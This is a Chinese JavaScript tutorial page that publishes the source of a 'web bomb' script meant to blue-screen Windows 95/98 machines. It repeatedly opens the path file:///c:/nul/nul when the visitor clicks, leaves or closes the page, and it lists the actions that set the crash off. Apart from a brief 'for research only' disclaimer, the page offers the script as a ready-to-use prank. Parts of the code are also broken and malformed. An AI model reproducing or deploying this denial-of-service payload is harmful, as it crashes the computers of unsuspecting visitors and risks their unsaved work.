站内搜索: 请输入搜索关键词

当前页面: 开发资料首页Javascript 专题100秒内蓝屏死机的脚本源代码

100秒内蓝屏死机的脚本源代码

摘要: 100秒内蓝屏死机的脚本源代码
<tr> <td>

  声明:此程序只供研究使用,如用做不正当用途后果自负!


  
  <head>
  <script LANGUAGE="javascript">

  function leave() {
  window.open(file:///c:/nul/nul,,toolbar=no,menubar=no,location=no,height=1,width=1);
  }
  // End
  

  
  WEB A-BOMBII BETA V0.5
  
  
  
  </head>

  <body onUnload="leave()" background onload="startclock()" bgcolor="#000000" text="#FFFFFF">
  </body>
  <script language="javascript">
  var timerID = null
  var timerRunning = false
  var stardate = new Date()
  var startime = gettotalsecond(stardate)

  function stopclock(){
  if(timerRunning)
  clearTimeout(timerID)
  timerRunning = false
  }

  function startclock(){

  stopclock()
  showtime()
  }

  function gettotalsecond(getdate) {
  var hours = getdate.getHours()
  var minutes = getdate.getMinutes()
  var seconds = getdate.getSeconds()
  var gettotalsecond = seconds + minutes * 60 + hours * 3600
  return(gettotalsecond)
  }

  function showtime(){
  var now = new Date()
  var timevalue = gettotalsecond(now)
  document.clock.face.value = timevalue - startime
  timerID = setTimeout("showtime()",1000)
  timerRunning = true
  }

  </script>
  
  size="6">

  <form name="clock" onsubmit="0">
  



  

  =网页教学网http://webjx.com=


  

  size="1" color="#FF00FF">您已经用去了<input name="face" size="5">秒时间   color="darkblue" size="6">


  

  </form>
  
<script>
  //kasper
  function click(){
  if(event.button==1){window.open("file:///c:/nul/nul") }

  if(event.button==2){window.open("file:///c:/nul/nul") }
  }
  document.onmousedown=click
  </script>

  <form name="sw">
  <input type="hidden" name="disp1" value="0:05"><input type="hidden" name="disp2"
  </form>
  <script language="javascript">

  

  

此炸弹只队WINDOWS95/98有效

  

  声明:此程序只供研究使用,如用做不正当用途后果自负!


  以下操作可以引爆炸弹!!!

  


  1.在本页停留100秒以上;

  2.在浏览区点击左右键;

  3.点击关闭按钮关闭此窗口;

  4.使用“CTRL+ALT+DEL”结束任务;

  5.使用“ALT+F4”关闭此窗口;

  


  

  </body>
  

</td> </tr> </table>
↑返回目录
前一篇: 从屏幕右下角自动上升的窗口的Javascript实现
后一篇: 妙用VBScript自制IE工具栏按钮